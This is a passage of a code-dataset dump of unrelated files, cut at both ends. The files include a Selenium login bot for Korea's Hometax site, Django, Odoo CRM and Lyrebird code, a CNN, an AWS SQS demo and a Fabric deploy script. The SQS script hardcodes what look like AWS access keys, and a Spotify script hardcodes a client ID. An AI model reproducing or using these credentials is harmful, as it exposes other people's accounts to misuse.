time.sleep(self.delay_time)\n self.loginnts()\n except:\n self.loginnts()\n time.sleep(self.delay_time + 1)\n\n def loginnts(self):\n \n # 홈텍스로 이동, 상단 로그인\n get_element(self.driver, nts_dict['elem_id']['login']['최상단로그인']).click()\n # self.driver.implicitly_wait(delay_time)\n\n # 메인영역\n elem = get_element(self.driver, nts_dict['메인영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time)\n \n # 관리자인 경우 공인인증서 직접로그인\n if nts_dict['secret']['부서아이디'] == nts_dict['secret']['수퍼아이디']:\n\n get_element(self.driver, 
nts_dict['elem_id']['login']['인증서로그인']).click()\n time.sleep(self.delay_time)\n\n # 공인인증서 영역\n elem = get_element(self.driver, nts_dict['elem_id']['login']['공인인증서영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time + 0.5)\n \n # 공인인증서 선택\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서명칭']).click()\n time.sleep(self.delay_time)\n\n # 인증서 비밀번호 입력\n cert_pw = nts_dict['secret']['공인인증서비번']\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서비번']).send_keys(cert_pw)\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서확인']).click()\n time.sleep(self.delay_time)\n self.driver.switch_to_alert.accept()\n\n # 메인영역\n elem = get_element(self.driver, nts_dict['메인영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time)\n\n # 세무대리인 관리번호 비번\n cta_id = nts_dict['secret']['세무사관리번호']\n cta_pw = nts_dict['secret']['세무사비번']\n get_element(self.driver, nts_dict['elem_id']['login']['세무사관리번호']).send_keys(cta_id)\n get_element(self.driver, nts_dict['elem_id']['login']['세무사비번']).send_keys(cta_pw)\n # 로그인 버튼\n get_element(self.driver, nts_dict['elem_id']['login']['최종로그인']).click()\n\n else:\n # 부서아이디 비번 로그인\n bs_id = nts_dict['secret']['부서아이디']\n bs_pw = nts_dict['secret']['부서비번']\n get_element(self.driver, nts_dict['elem_id']['login']['부서아이디']).send_keys(bs_id)\n get_element(self.driver, nts_dict['elem_id']['login']['부서비번']).send_keys(bs_pw)\n # 부서아이디로그인 버튼\n get_element(self.driver, nts_dict['elem_id']['login']['부서아이디로그인']).click()\n time.sleep(self.delay_time + 1)\n\n # 공인인증서 영역\n elem = get_element(self.driver, nts_dict['elem_id']['login']['공인인증서영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time + 1)\n\n # 공인인증서 선택\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서명칭']).click()\n time.sleep(self.delay_time)\n\n # 인증서 비밀번호 입력\n cert_pw = nts_dict['secret']['공인인증서비번']\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서비번']).send_keys(cert_pw)\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서확인']).click()\n time.sleep(self.delay_time + 1)\n self.driver.switch_to.alert.accept()\n\n # 메인영역\n elem = get_element(self.driver, nts_dict['메인영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time)\n\n # 세무대리인 관리번호 비번\n cta_id = nts_dict['secret']['세무사관리번호']\n cta_pw = nts_dict['secret']['세무사비번']\n get_element(self.driver, nts_dict['elem_id']['login']['세무사관리번호']).send_keys(cta_id)\n get_element(self.driver, nts_dict['elem_id']['login']['세무사비번']).send_keys(cta_pw)\n # 로그인 버튼\n get_element(self.driver, nts_dict['elem_id']['login']['최종로그인']).click()\n\nif __name__ == \"__main__\":\n # login = Nts_Login()\n # login.path2()\n\n app = QApplication(sys.argv)\n ex = Main()\n sys.exit(app.exec_())\n\n","sub_path":"ATM_V1.py","file_name":"ATM_V1.py","file_ext":"py","file_size_in_byte":18790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453686201","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n url(r'^$', 'infoviz.views.home', name='home'),\n url(r'^disclaimer$', 'infoviz.views.disclaimer', name='disclaimer'),\n url(r'^books/', include('books.urls', namespace=\"books\")),\n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"infoviz/infoviz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92285027","text":"# Definition for a binary tree 
node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def inorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n # Early termination\n if root == None: return []\n\n self.traversal_list = []\n\n def traversal(node):\n if node.left != None:\n traversal(node.left)\n self.traversal_list.append(node.val)\n if node.right != None:\n traversal(node.right)\n\n traversal(root)\n\n return self.traversal_list\n","sub_path":"Codes/94_Binary_Tree_Inorder_Traversal/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136544436","text":"from .. import context\nfrom lyrebird import application\nfrom urllib.parse import urlparse\nimport urllib\nimport uuid\nimport time\nimport gzip\nimport json\n\n\nclass HandlerContext:\n \"\"\"\n 请求处理器上下文变量\n 用于保存一个请求处理过程中的request, response\n\n \"\"\"\n MOCK_PATH_PREFIX = '/mock'\n\n def __init__(self, request, raw_path):\n self.id = str(uuid.uuid4())\n self.request = request\n self._raw_path = raw_path\n self._response = None\n self.client_req_time = None\n self.client_resp_time = None\n self.server_req_time = None\n self.server_resp_time = None\n self.flow = dict(id=self.id, size=0, duration=0)\n self.client_address = None\n self._parse_request()\n\n \n def _parse_request(self):\n # Read stream\n self.request.get_data()\n # parse path\n request_info = self._read_origin_request_info_from_url()\n if not request_info['host']:\n request_info = self._read_origin_request_info_from_header()\n\n headers = {k:v for k,v in self.request.headers}\n _request = dict(\n headers=headers,\n method=self.request.method,\n )\n _request.update(request_info)\n \n # handle request data\n if self.request.method in ['POST', 'PUT']:\n RequestDataHelper.req2dict(self.request, output=_request)\n \n if self.request.headers.get('Lyrebird-Client-Address'):\n self.client_address = self.request.headers.get('Lyrebird-Client-Address')\n else:\n self.client_address = self.request.remote_addr\n \n self.flow['request'] = _request\n context.application.cache.add(self.flow)\n\n def _read_origin_request_info_from_url(self):\n path_index = self.request.url.index(self._raw_path)\n url = self.request.url[path_index:]\n parsed_path = urlparse(url)\n _request = dict(\n url=url,\n scheme=parsed_path.scheme,\n host=parsed_path.hostname,\n port=parsed_path.port if parsed_path.port else '80',\n path=parsed_path.path\n )\n return _request\n \n def _read_origin_request_info_from_header(self):\n proxy_headers = application.config['mock.proxy_headers']\n scheme = self.request.headers.get(proxy_headers['scheme'], default='http')\n host = self.request.headers.get(proxy_headers['host'])\n port = self.request.headers.get(proxy_headers['port'], default='80')\n if not host:\n return {}\n scheme = scheme.strip()\n host = host.strip()\n port = port.strip()\n return dict(\n url=scheme+'://'+host+':'+port+self.request.full_path[len(self.MOCK_PATH_PREFIX):],\n scheme=scheme,\n host=host,\n port=port,\n path=self.request.path[len(self.MOCK_PATH_PREFIX):]\n )\n\n @property\n def response(self):\n return self._response\n\n @response.setter\n def response(self, val):\n self._response = val\n self.update_server_resp_time()\n\n _response = dict(\n code=self._response.status_code,\n headers={k:v for (k,v) in self._response.headers}\n )\n ResponseDataHelper.resp2dict(self._response, output=_response)\n 
self.flow['response'] = _response\n if val.content_length:\n self.flow['size'] = val.content_length\n else:\n self.flow['size'] = len(val.data)\n self.flow['duration'] = self.server_resp_time - self.client_req_time\n\n if context.application.work_mode == context.Mode.RECORD:\n dm = context.application.data_manager\n group = dm.groups.get(dm.activated_group_id)\n if group:\n data = group.create_data(flow=self.flow)\n data.save()\n\n def _read_response_info(self):\n self._response.headers.get('Content-Type')\n\n def update_client_req_time(self):\n self.client_req_time = time.time()\n # 消息总线 客户端请求事件\n context.application.event_bus.publish('flow',\n dict(name='client.request',\n time=self.client_req_time,\n id=self.id,\n flow=self.flow\n ))\n\n def update_client_resp_time(self):\n self.client_resp_time = time.time()\n # 消息总线 客户端响应事件\n context.application.event_bus.publish('flow',\n dict(name='client.response',\n time=self.client_resp_time,\n id=self.id,\n flow=self.flow))\n\n def update_server_req_time(self):\n self.server_req_time = time.time()\n # 消息总线 客户端请求事件\n context.application.event_bus.publish('flow',\n dict(name='server.request',\n time=self.server_req_time,\n id=self.id,\n flow=self.flow))\n\n def update_server_resp_time(self):\n self.server_resp_time = time.time()\n # 消息总线 客户端请求事件\n context.application.event_bus.publish('flow',\n dict(name='server.response',\n time=self.server_resp_time,\n id=self.id,\n flow=self.flow))\n\n def get_origin_url(self):\n return self.flow['request'].get('url')\n\n\nclass RequestDataHelper:\n\n @staticmethod\n def req2dict(request, output=None):\n if not output:\n output = {}\n content_encoding = request.headers.get('Content-Encoding')\n # Content-Encoding handler\n unziped_data = None\n if content_encoding and content_encoding == 'gzip':\n unziped_data = gzip.decompress(request.data)\n\n content_type = request.headers.get('Content-Type')\n if not content_type:\n output['binary_data'] = 'bin'\n else:\n content_type = content_type.strip()\n\n if content_type.startswith('application/x-www-form-urlencoded'):\n if unziped_data:\n output['data'] = urllib.parse.parse_qs(unziped_data.decode('utf-8'))\n else:\n output['data'] = request.form.to_dict()\n elif content_type.startswith('application/json'):\n if unziped_data:\n output['data'] = json.loads(unziped_data.decode('utf-8'))\n else:\n output['data'] = request.json\n elif content_type.startswith('text/xml'):\n if unziped_data:\n output['data'] = unziped_data.decode('utf-8')\n else:\n output['data'] = request.data.decode('utf-8')\n else:\n # TODO write bin data\n output['binary_data'] = 'bin'\n\n\nclass ResponseDataHelper:\n\n @staticmethod\n def resp2dict(response, output=None):\n if not output:\n output = {}\n content_type = response.headers.get('Content-Type')\n if not content_type:\n output['binary_data'] = 'bin'\n else:\n content_type = content_type.strip()\n \n if content_type.startswith('application/json'):\n output['data'] = response.json\n elif content_type.startswith('text/xml'):\n output['data'] = response.data.decode('utf-8')\n elif content_type.startswith('text/html'):\n output['data'] = response.data.decode('utf-8')\n else:\n # TODO write bin data\n output['binary_data'] = 'bin'\n","sub_path":"lyrebird/mock/handlers/handler_context.py","file_name":"handler_context.py","file_ext":"py","file_size_in_byte":8013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"544324274","text":"# -*- coding: utf-8 -*-\nimport logging\n_logger = 
logging.getLogger(__name__)\n\nfrom openerp import api, models, fields\nfrom openerp.exceptions import Warning\n\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime\nimport pytz\n\nclass CrmLead(models.Model):\n _inherit = 'crm.lead'\n\n @api.one\n def automation_proces(self, params):\n _logger.info('Aplicando automatizaciones del flujo')\n _logger.info(self.id)\n # example params\n '''\n params = {\n 'action_log': 'custom_17_18_19_enero_2020',\n 'user_id': 1,\n 'next_activity': True,\n 'next_activity_id': 3,\n 'next_activity_date_action': '2020-01-01',\n 'next_activity_title_action': 'Revisar flujo automatico',\n 'mail_template_id': 133,\n 'lead_stage_id': 2\n }\n '''\n # special_log\n if 'action_log' in params:\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': str(params['action_log']),\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # check_user_id crm_lead\n if 'user_id' in params:\n if self.user_id.id == 0:\n user_id_random = int(params['user_id'])\n #write\n self.write({\n 'user_id': user_id_random\n })\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'asign_user_id',\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # fix change user_id res.partner\n if self.partner_id.user_id.id == 0:\n self.partner_id.user_id = user_id_random\n # next_activity_id\n if 'next_activity' in params:\n if params['next_activity'] == True:\n self.write({\n 'next_activity_id': int(params['next_activity_id']), # Tarea\n 'date_action': str(params['next_activity_date_action']),\n 'title_action': str(params['next_activity_title_action'])\n })\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'assign_next_activity_id_' + str(params['next_activity_id']),\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # send_mail\n if 'mail_template_id' in params:\n self.action_send_mail_with_template_id(int(params['mail_template_id']))\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'send_mail',\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n # update crm.lead stage_id\n if 'lead_stage_id' in params:\n self.stage_id = int(params['lead_stage_id'])\n # save_log\n automation_log_vals = {\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'category': 'crm_lead',\n 'action': 'change_stage_id',\n }\n automation_log_obj = self.env['automation.log'].sudo().create(automation_log_vals)\n\n @api.one\n def action_send_mail_with_template_id(self, template_id=False):\n if template_id!=False:\n mail_template_item = self.env['mail.template'].browse(template_id)\n mail_compose_message_vals = { \n 'author_id': 1,\n 'record_name': self.name, \n }\n #Fix user_id\n if self.user_id.id>0:\n mail_compose_message_vals['author_id'] = self.user_id.partner_id.id\n mail_compose_message_obj = self.env['mail.compose.message'].with_context().sudo(self.user_id.id).create(mail_compose_message_vals)\n else:\n mail_compose_message_obj = self.env['mail.compose.message'].with_context().sudo().create(mail_compose_message_vals)\n\n return_onchange_template_id = mail_compose_message_obj.onchange_template_id(mail_template_item.id, 'comment', 'crm.lead', self.id)\n 
#mail_compose_message_obj_vals\n mail_compose_message_obj_vals = {\n 'author_id': mail_compose_message_vals['author_id'],\n 'template_id': mail_template_item.id,\n 'composition_mode': 'comment',\n 'model': 'crm.lead',\n 'res_id': self.id,\n 'body': return_onchange_template_id['value']['body'],\n 'subject': return_onchange_template_id['value']['subject'],\n # 'attachment_ids': return_onchange_template_id['value']['attachment_ids'],\n 'record_name': mail_compose_message_vals['record_name'],\n 'no_auto_thread': False,\n }\n # partner_ids\n if 'email_from' in return_onchange_template_id['value']:\n mail_compose_message_obj_vals['email_from'] = return_onchange_template_id['value']['email_from']\n #partner_ids\n if 'partner_ids' in return_onchange_template_id['value']:\n mail_compose_message_obj_vals['partner_ids'] = return_onchange_template_id['value']['partner_ids']\n #update\n mail_compose_message_obj.update(mail_compose_message_obj_vals)\n #send_mail_action\n mail_compose_message_obj.send_mail_action()\n #return\n return True\n\n @api.multi \n def cron_automation_todocesped_profesional_potenciales(self, cr=None, uid=False, context=None):\n current_date = datetime.now(pytz.timezone('Europe/Madrid'))\n tomorrow_date = current_date + relativedelta(days=+1) \n \n partners = {}\n res_partner_ids = self.env['res.partner'].search(\n [\n ('active', '=', True),\n ('type', '=', 'contact'),\n ('ar_qt_activity_type', '=', 'todocesped'),\n ('ar_qt_customer_type', '=', 'profesional'),\n ('user_id', '!=', False),\n ('create_date', '<', '2018-01-01')\n ]\n ) \n if res_partner_ids!=False: \n res_partner_ids_potencial = []\n for res_partner_id in res_partner_ids:\n if res_partner_id.ref!=False: \n res_partner_ids_potencial.append(res_partner_id.id)\n partners[res_partner_id.id] = res_partner_id \n #account_invoice\n account_invoice_ids = self.env['account.invoice'].search(\n [\n ('state', 'in', ('open','paid')),\n ('amount_total', '>', 0),\n ('type', '=', 'out_invoice'),\n ('partner_id', 'in', res_partner_ids_potencial)\n ]\n ) \n if account_invoice_ids!=False:\n for account_invoice_id in account_invoice_ids:\n if account_invoice_id.partner_id.id in res_partner_ids_potencial:\n res_partner_ids_potencial.remove(account_invoice_id.partner_id.id)\n \n if res_partner_ids_potencial!=False: \n #crm_lead_6_months\n start_date = current_date + relativedelta(months=-6)\n end_date = current_date\n \n for res_partner_id_potencial in res_partner_ids_potencial:\n partner_item = partners[res_partner_id_potencial]\n \n crm_activity_report_ids = self.env['crm.activity.report'].search(\n [\n ('subtype_id', 'in', (1,2,4)),\n ('partner_id', '=', partner_item.id),\n ('lead_id', '!=', False),\n ('date', '>=', start_date.strftime(\"%Y-%m-%d\")),\n ('date', '<=', end_date.strftime(\"%Y-%m-%d\"))\n ]\n )\n if len(crm_activity_report_ids)==0:\n crm_lead_ids = self.env['crm.lead'].search(\n [\n ('active', '=', True),\n ('probability', '<', 100),\n ('partner_id', '=', partner_item.id), \n ('ar_qt_activity_type', '=', partner_item.ar_qt_activity_type),\n ('ar_qt_customer_type', '=', partner_item.ar_qt_customer_type), \n ]\n )\n if len(crm_lead_ids)>0:\n for crm_lead_id in crm_lead_ids:\n change_next_activity = True\n if crm_lead_id.next_activity_id!=False and crm_lead_id.date_action!=False and crm_lead_id.date_action>current_date.strftime(\"%Y-%m-%d\"):\n change_next_activity = False\n \n if change_next_activity==True:\n crm_lead_id.next_activity_id = 1#Email\n crm_lead_id.date_action = tomorrow_date.strftime(\"%Y-%m-%d\")\n 
crm_lead_id.title_action = 'Email potencial'\n else:\n #Auto-create lead \n crm_lead_vals = {\n 'active': True, \n 'type': 'opportunity',\n 'stage_id': 1,\n 'name': partner_item.name,\n 'partner_id': partner_item.id,\n 'ar_qt_activity_type': partner_item.ar_qt_activity_type,\n 'ar_qt_customer_type': partner_item.ar_qt_customer_type,\n 'user_id': partner_item.user_id.id,\n 'next_activity_id': 1,#Email\n 'date_action': tomorrow_date.strftime(\"%Y-%m-%d\"),\n 'create_date': current_date,\n 'title_action': 'Email potencial' \n }\n crm_lead_obj = self.env['crm.lead'].sudo(partner_item.user_id.id).create(crm_lead_vals)\n crm_lead_obj._onchange_partner_id()\n \n @api.multi \n def cron_automation_todocesped_profesional_potenciales_activo(self, cr=None, uid=False, context=None):\n current_date = datetime.now(pytz.timezone('Europe/Madrid'))\n tomorrow_date = current_date + relativedelta(days=+1) \n \n partners = {}\n res_partner_ids = self.env['res.partner'].search(\n [\n ('active', '=', True),\n ('type', '=', 'contact'), \n ('ar_qt_activity_type', '=', 'todocesped'),\n ('ar_qt_customer_type', '=', 'profesional'),\n ('user_id', '!=', False),\n ('ref', '=', False),\n ('create_date', '>=', '2018-01-01')\n ]\n ) \n if res_partner_ids!=False:\n res_partner_ids_potencial_activo = []\n for res_partner_id in res_partner_ids: \n res_partner_ids_potencial_activo.append(res_partner_id.id)\n partners[res_partner_id.id] = res_partner_id \n #account_invoice\n account_invoice_ids = self.env['account.invoice'].search(\n [\n ('state', 'in', ('open','paid')),\n ('amount_total', '>', 0),\n ('type', '=', 'out_invoice'),\n ('partner_id', 'in', res_partner_ids_potencial_activo)\n ]\n ) \n if account_invoice_ids!=False:\n for account_invoice_id in account_invoice_ids:\n if account_invoice_id.partner_id.id in res_partner_ids_potencial_activo:\n res_partner_ids_potencial_activo.remove(account_invoice_id.partner_id.id)\n \n if res_partner_ids_potencial_activo!=False:\n #crm_lead_3_months\n start_date = current_date + relativedelta(months=-3)\n end_date = current_date\n \n for res_partner_id_potencial_activo in res_partner_ids_potencial_activo:\n partner_item = partners[res_partner_id_potencial_activo]\n \n crm_activity_report_ids = self.env['crm.activity.report'].search(\n [\n ('subtype_id', 'in', (1,2,4)),\n ('partner_id', '=', partner_item.id),\n ('lead_id', '!=', False),\n ('date', '>=', start_date.strftime(\"%Y-%m-%d\")),\n ('date', '<=', end_date.strftime(\"%Y-%m-%d\"))\n ]\n )\n if len(crm_activity_report_ids)==0:\n crm_lead_ids = self.env['crm.lead'].search(\n [\n ('active', '=', True),\n ('probability', '<', 100),\n ('partner_id', '=', partner_item.id), \n ('ar_qt_activity_type', '=', partner_item.ar_qt_activity_type),\n ('ar_qt_customer_type', '=', partner_item.ar_qt_customer_type),\n ]\n )\n if len(crm_lead_ids)>0:\n for crm_lead_id in crm_lead_ids:\n change_next_activity = True\n if crm_lead_id.next_activity_id!=False and crm_lead_id.date_action!=False and crm_lead_id.date_action>current_date.strftime(\"%Y-%m-%d\"):\n change_next_activity = False\n \n if change_next_activity==True:\n crm_lead_id.next_activity_id = 2#Llamada\n crm_lead_id.date_action = tomorrow_date.strftime(\"%Y-%m-%d\")\n crm_lead_id.title_action = 'Llamada potencial activo'\n else:\n #Auto-create lead \n crm_lead_vals = {\n 'active': True, \n 'type': 'opportunity',\n 'stage_id': 1,\n 'name': partner_item.name,\n 'partner_id': partner_item.id,\n 'ar_qt_activity_type': partner_item.ar_qt_activity_type,\n 'ar_qt_customer_type': 
partner_item.ar_qt_customer_type,\n 'user_id': partner_item.user_id.id,\n 'next_activity_id': 2,#Llamada\n 'date_action': tomorrow_date.strftime(\"%Y-%m-%d\"),\n 'create_date': current_date,\n 'title_action': 'Llamada potencial activo' \n }\n crm_lead_obj = self.env['crm.lead'].sudo(partner_item.user_id.id).create(crm_lead_vals)\n crm_lead_obj._onchange_partner_id()\n \n @api.multi \n def cron_automation_todocesped_profesional_puntuales(self, cr=None, uid=False, context=None):\n _logger.info('cron_automation_todocesped_profesional_puntuales')\n \n @api.multi \n def cron_automation_todocesped_profesional_recurrentes(self, cr=None, uid=False, context=None):\n _logger.info('cron_automation_todocesped_profesional_recurrentes')\n \n @api.multi \n def cron_automation_todocesped_profesional_fidelizados(self, cr=None, uid=False, context=None):\n _logger.info('cron_automation_todocesped_profesional_fidelizados') \n\n @api.multi \n def cron_automation_todocesped_profesional(self, cr=None, uid=False, context=None):\n #potenciales\n #self.cron_automation_todocesped_profesional_potenciales()\n #potenciales_activo\n #self.cron_automation_todocesped_profesional_potenciales_activo()\n #puntuales\n #self.cron_automation_todocesped_profesional_puntuales()\n #recurrentes\n #self.cron_automation_todocesped_profesional_recurrentes()\n #fidelizados\n #self.cron_automation_todocesped_profesional_fidelizados()\n _logger.info('cron_automation_todocesped_profesional') ","sub_path":"arelux_automation/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":18511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"175902213","text":"# This script created a queue\n#\n# Author Brian Briscoe\n#\n#\nimport boto.sqs\nimport boto.sqs.queue\nfrom boto.sqs.message import Message\nfrom boto.sqs.connection import SQSConnection\nfrom boto.exception import SQSError\n\n#Establishing neccessary connections\nconn = boto.sqs.connect_to_region(\"us-east-1\", aws_access_key_id='abcAKIAIR7EH3TNSTDUCWKA', aws_secret_access_key='abct2FZT5mrLYy8gX7kS1q0p4ObQYXTwGnaiUm+rxHZ')\n\n#1. Creating queue and setting the name\nq = conn.create_queue('Brian_Briscoes_Queue')\n\n#2. Writing 1 message to the queue\nm = Message()\nm.set_body('Test message using a queue')\nq.write(m)\n\n#3. Writing 100 messages to the queue\nfor i in range(1, 100):\n m = Message()\n m.set_body('This is message %d' % i)\n q.write(m)\n\n#4. Getting the message from the queue\nrs = q.get_messages()\nm = rs[0]\nmessageString = m.get_body()\nprint (messageString)\n\n#5. 
Deleting a message from the queue\nq.delete_message(m)\n\n","sub_path":"aws/queue_program.py","file_name":"queue_program.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"637149251","text":"#!/usr/bin/python3\n\"\"\"Fabric script that distributes an archive to your web servers\"\"\"\nfrom fabric.api import run, put, env\nfrom os.path import exists\n\nenv.hosts = ['34.75.252.164', '35.237.149.147']\n\n\ndef do_deploy(archive_path):\n \"\"\" Fabric script that distributes an archive to your web servers\"\"\"\n if exists(archive_path) is True:\n try:\n filename = archive_path.split('/')[-1]\n no_ex = filename.split('.')[0]\n put(archive_path, '/tmp/')\n foldername = \"/data/web_static/releases/\" + no_ex\n run(\"mkdir -p {}/\".format(foldername))\n run(\"tar -xzf /tmp/{} -C {}/\".format(filename, foldername))\n run(\"rm /tmp/{}\".format(filename))\n run('mv {}/web_static/* {}/'.format(foldername, foldername))\n run(\"rm -rf {}/web_static\".format(foldername))\n run(\"rm -rf /data/web_static/current\")\n run(\"ln -s {}/\\\n /data/web_static/current\".format(foldername))\n return True\n except:\n return False\n return False\n","sub_path":"2-do_deploy_web_static.py","file_name":"2-do_deploy_web_static.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"569984318","text":"# Default Imports\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\ndata = read_data()\n\n\n# Your Solution\ndef BC_runs(data):\n inn = data[\"innings\"][0][\"1st innings\"][\"deliveries\"]\n runs=0\n for i in range (0,len(inn)):\n delv = inn[i]\n if delv[delv.keys()[0]]['batsman'] == 'BB McCullum':\n runs=runs+delv[delv.keys()[0]]['runs']['batsman']\n return(runs)\n","sub_path":"q05_runs/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"517603250","text":"from typing import Any, Dict\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nN_CONVS = 3\nCONV_DIM = 64\nFC_DIM = 128\nIMAGE_SIZE = 28\nKERNEL_SIZE = 3\nSTRIDE = 2\nDROPOUT = .1\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n ResNet BasicBlock.\n \"\"\"\n def __init__(self, input_channels: int, output_channels: int,\n kernel_size: int = 3, stride: int = 1, dilation: int = 1) -> None:\n super().__init__()\n self.conv1 = nn.Conv2d(input_channels, output_channels, kernel_size=kernel_size, stride=stride, padding=dilation, dilation=dilation)\n self.conv2 = nn.Conv2d(output_channels, output_channels, kernel_size=kernel_size, stride=1, dilation=1, padding=1)\n self.bn1 = nn.BatchNorm2d(output_channels)\n self.bn2 = nn.BatchNorm2d(output_channels)\n self.relu = nn.ReLU()\n\n self.expansion = 1\n if stride > 1:\n self.downsample = nn.Sequential(\n nn.Conv2d(input_channels, output_channels * self.expansion, kernel_size=1, stride=stride),\n nn.BatchNorm2d(output_channels * self.expansion),\n )\n else:\n self.downsample = None\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Parameters\n ----------\n x\n of dimensions (B, C, H, W)\n\n Returns\n -------\n torch.Tensor\n of dimensions (B, C, H, W)\n \"\"\"\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n if self.downsample != None:\n x = self.downsample(x)\n out += x\n 
out = self.relu(out)\n return out\n\n\nclass CNN(nn.Module):\n \"\"\"Simple CNN for recognizing characters in a square image.\"\"\"\n\n def __init__(self, data_config: Dict[str, Any], args: argparse.Namespace = None) -> None:\n super().__init__()\n self.args = vars(args) if args is not None else {}\n\n input_dims = data_config[\"input_dims\"]\n num_classes = len(data_config[\"mapping\"])\n\n conv_dim = self.args.get(\"conv_dim\", CONV_DIM)\n n_convs = self.args.get(\"n_convs\", N_CONVS)\n fc_dim = self.args.get(\"fc_dim\", FC_DIM)\n kernel_size = self.args.get(\"kernel_size\", KERNEL_SIZE)\n dropout = self.args.get(\"dropout\", DROPOUT)\n stride = self.args.get(\"stride\", STRIDE)\n dilation = self.args.get(\"dilation\", 1)\n\n self.conv1 = ConvBlock(input_dims[0], conv_dim, kernel_size=kernel_size, stride=stride, dilation=dilation)\n if n_convs > 1:\n self.extra_convs = nn.ModuleList([\n ConvBlock(conv_dim, conv_dim, kernel_size=kernel_size, stride=stride, dilation=dilation)\n for i in range(n_convs-1)\n ])\n else:\n self.extra_convs = None\n # self.conv2 = ConvBlock(conv_dim, conv_dim, stride=stride, dilation=1)\n self.dropout = nn.Dropout(dropout)\n\n # Because our 3x3 convs have padding size 1, they leave the input size unchanged.\n # The 2x2 max-pool divides the input size by 2. Flattening squares it.\n conv_output_size = int(((IMAGE_SIZE + (2 * dilation) - kernel_size) / stride) + 1)\n for i in range(n_convs -1):\n conv_output_size = int(((conv_output_size + (2 * dilation) - kernel_size) / stride) + 1)\n fc_input_dim = int(conv_output_size * conv_output_size * conv_dim)\n self.fc1 = nn.Linear(fc_input_dim, fc_dim)\n self.fc2 = nn.Linear(fc_dim, num_classes)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x\n (B, C, H, W) tensor, where H and W must equal IMAGE_SIZE\n\n Returns\n -------\n torch.Tensor\n (B, C) tensor\n \"\"\"\n _B, _C, H, W = x.shape\n assert H == W == IMAGE_SIZE\n x = self.conv1(x)\n x = self.dropout(x)\n if self.extra_convs:\n for conv in self.extra_convs:\n x = conv(x)\n x = self.dropout(x)\n # x = self.conv2(x)\n # x = self.dropout(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n @staticmethod\n def add_to_argparse(parser):\n parser.add_argument(\"--n_convs\", type=int, default=N_CONVS)\n parser.add_argument(\"--conv_dim\", type=int, default=CONV_DIM)\n parser.add_argument(\"--fc_dim\", type=int, default=FC_DIM)\n parser.add_argument(\"--stride\", type=int, default=STRIDE)\n parser.add_argument(\"--dropout\", type=float, default=DROPOUT)\n return parser\n","sub_path":"lab2/text_recognizer/models/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22861163","text":"import pandas as pd\nfrom sqlalchemy import create_engine\nimport pymysql\npymysql.install_as_MySQLdb()\nfrom mysql_conn import password\nimport os\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom pprint import pprint\nimport json\nimport numpy as np\n\n# Change working directory to file location\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\n\n# Client credentials\nclient_credentials_manager = SpotifyClientCredentials(\n client_id='7b0e5ed233304809ae9933fd28fb4ee8', \n 